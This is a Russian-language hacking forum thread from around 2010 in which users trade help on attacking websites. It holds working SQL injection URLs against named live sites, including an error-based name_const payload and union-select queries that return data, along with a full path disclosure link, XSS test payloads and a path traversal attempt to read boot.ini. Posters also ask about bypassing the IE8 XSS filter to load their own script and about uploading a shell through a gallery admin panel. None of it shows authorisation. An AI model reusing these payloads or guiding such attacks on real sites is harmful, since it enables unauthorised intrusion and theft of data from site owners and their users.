Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. manmerritt0

    manmerritt0 New Member

    Joined:
    31 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста, какие есть способы обхода встроенного xss фильтра для IE8. Перепробовал все способы с этой статьи:
    http://www.xakep.ru/magazine/xa/130/062/1.asp
    на версии 8.0.6001.18702 - ни один не работает.
    В результате xss желательно подгрузить свой .js файл через src или каким-то иным способом, чтобы код в нем исполнился. Заранее спасибо
     
  2. Buddah

    Buddah New Member

    Joined:
    26 Nov 2007
    Messages:
    1
    Likes Received:
    4
    Reputations:
    0
    Если в postgresql нет прав usesuper, можно что либо сделать при иньекции?
     
  3. gabarea

    gabarea New Member

    Joined:
    30 Mar 2010
    Messages:
    30
    Likes Received:
    2
    Reputations:
    1
    http://www.mahiram.com/browse_classifieds.php?classifiedcat_id=4
     
  4. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    а вопрос :)

    SQL inj
    Code:
    http://www.mahiram.com/browse_classifieds.php?classifiedcat_id=4%20or(1,2)=(select*from(select%20name_const(version(),1),name_const(version(),1))a)
    FPD
    Code:
    http://www.mahiram.com/wp-includes/vars.php?PHP_SELF=be
     
    #15164 Strilo4ka, 23 Oct 2010
    Last edited: 23 Oct 2010
  5. gabarea

    gabarea New Member

    Joined:
    30 Mar 2010
    Messages:
    30
    Likes Received:
    2
    Reputations:
    1
    http://www.mahiram.com/browse_classifieds.php?classifiedcat_id=4
    Error: The used SELECT statements have a different number of columns
    blind sql
     
  6. DesCent

    DesCent Banned

    Joined:
    9 Jul 2010
    Messages:
    276
    Likes Received:
    51
    Reputations:
    16
    Для начала - где эта хсс.
    Насчет "фильтрация и..." сказать ничего не могу, т.к. данным софтом не пользовался.
     
  7. gera

    gera Banned

    Joined:
    30 Sep 2010
    Messages:
    89
    Likes Received:
    8
    Reputations:
    0
    вот тут: http://onona.ua/diary/search.phtml?type=popular&tag=1206302%3C%3E
    я вот не могу понять как мне найти что бы появилось окошко
    -----------------------------------------------------------------
    а каким лучше скриптом проверять на уязвимость ??
    "><script>alert('xss')</script>
    <script type="text/javascript">Alert("XSS")</ SCRIPT>
    или на пиши свой
    ТУТ МНЕ ПОМОГУТ ?
    разобраться
     
    #15167 gera, 23 Oct 2010
    Last edited: 23 Oct 2010
  8. DesCent

    DesCent Banned

    Joined:
    9 Jul 2010
    Messages:
    276
    Likes Received:
    51
    Reputations:
    16
    Уж простите нуба, но самому интересно что это:
    При выполнении такого запроса, вверху сайта появляется строчка
    Code:
    function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i'));dF('&4Dtdsjqu&4Fbmfsu&39&38YTT&38&3:&4D0tdsjqu&4F1')">
    Что это? Понимаю, что здесь подобных вопросов(и нубов) сотни, но интересно - что это?
     
  9. Generalisimu

    Generalisimu New Member

    Joined:
    23 Jun 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Help!помогите!

    нашел уязвимость!но не могу правельно составить запрос!

    http://www.activ.kz/ru/?l=news&o=display&page=&idx=345

    Microsoft JET Database Engine error '80040e14'

    Syntax error in string in query expression 'NEWS_ID=345';'.

    /ru/_news.asp, line 260


    http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3,4,5,6,7,8+from+news



    http://www.activ.kz/ru/?l=news&o=display&page=&idx=-345+union+select+*+from+msysobjects+in+'.'





    Microsoft JET Database Engine error '80004005'

    The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.

    /ru/_news.asp, line


    Но вывести нечего не удаеться.

    Поскажите, как правилбно составить запрос.
     
  10. gera

    gera Banned

    Joined:
    30 Sep 2010
    Messages:
    89
    Likes Received:
    8
    Reputations:
    0
    Ты решил мне помочь ?? я рад
    не ходите на эти ссылки он туда вирус всунул У меня авира ругается
     
    #15170 gera, 23 Oct 2010
    Last edited: 23 Oct 2010
  11. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Запрос правильный.
    Вот например выводится id новости.
    Code:
    http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3,4,NEWS_ID,6,7,8+from+news
    Так как доступа нет к системным таблицам MS Access, подбирать таблицу и колонки придется в ручную.

    Советую почитать Проведение SQL инъекций в Microsoft Access
     
    #15171 TreV@N, 23 Oct 2010
    Last edited: 23 Oct 2010
  12. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    как залить шелл через админку Coppermine Photo Gallery 1.4.12?
     
  13. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    .:[melkiy]:., линк в ПМ.
     
  14. JohnnyBGoode

    JohnnyBGoode Member

    Joined:
    5 Oct 2010
    Messages:
    48
    Likes Received:
    11
    Reputations:
    5
    http://www.7not.net/?m=news&n='
    http://www.7not.net/?n=-1'

    Как здесь запрос составить подскажите.Пробовал и union+select и order+by и что-то ничего не выходит
     
  15. Gedj

    Gedj Elder - Старейшина

    Joined:
    15 Sep 2008
    Messages:
    85
    Likes Received:
    30
    Reputations:
    2
    Нет тут скули
     
  16. povar

    povar New Member

    Joined:
    24 Oct 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    PHP:
    $a preg_replace('/\//','',$_GET["b"]);
    подскажите, тут можно как-нибудь выполнить произвольный код?
     
  17. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Это равносильно тому, что написать:
    $a = $_GET['a'];
    тут есть выполнение произвольного кода?

    Может переменная попадает в SQL запрос, или eval, или include, или просто выводится на страницу. Исходя из этого уже можно делать какие то выводы. А пока что, экстрасенсов тут нет.
    Все, что можно сказать по этой строке, это то, что переменная 'a' равна переменной 'b', переданной методом GET с отфильтрованными слешами.
    Либо выкладывай больше кода, либо выполнения произвольного кода здесь нет.
     
    #15177 h00lyshit!, 26 Oct 2010
    Last edited: 26 Oct 2010
  18. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    А при чем тут выполнение кода? Тут, я так понимаю, режуться символы от LFI\RFI. Есть способы обхода данного фильтра, фильтр слишком глупый =\


    UPD: Я что-то не понял фильтра, там вроде массив должен быть, но не как все сразу перечислены, такой фильтр не от чего не защищает :D
     
  19. povar

    povar New Member

    Joined:
    24 Oct 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Выдержка из этой статьи:
    https://forum.antichat.ru/thread56756.html

    В моем случае так нельзя проделать?
     
    #15179 povar, 26 Oct 2010
    Last edited: 26 Oct 2010
  20. povar

    povar New Member

    Joined:
    24 Oct 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    дальше идет:

    PHP:
     $f fopen("./$a""r");     
    while(
    $r=fread($f1024)) print $r
    все это крутится на винде, скорее всего хр.
    т.к. / фильтруются, пробовал ..\..\..\..\..\..\..\boot.ini
    но не выводит ничего. ошибки не выводятся, путей нет.
    какие варианты дальнейших действий?
     
Thread Status:
Not open for further replies.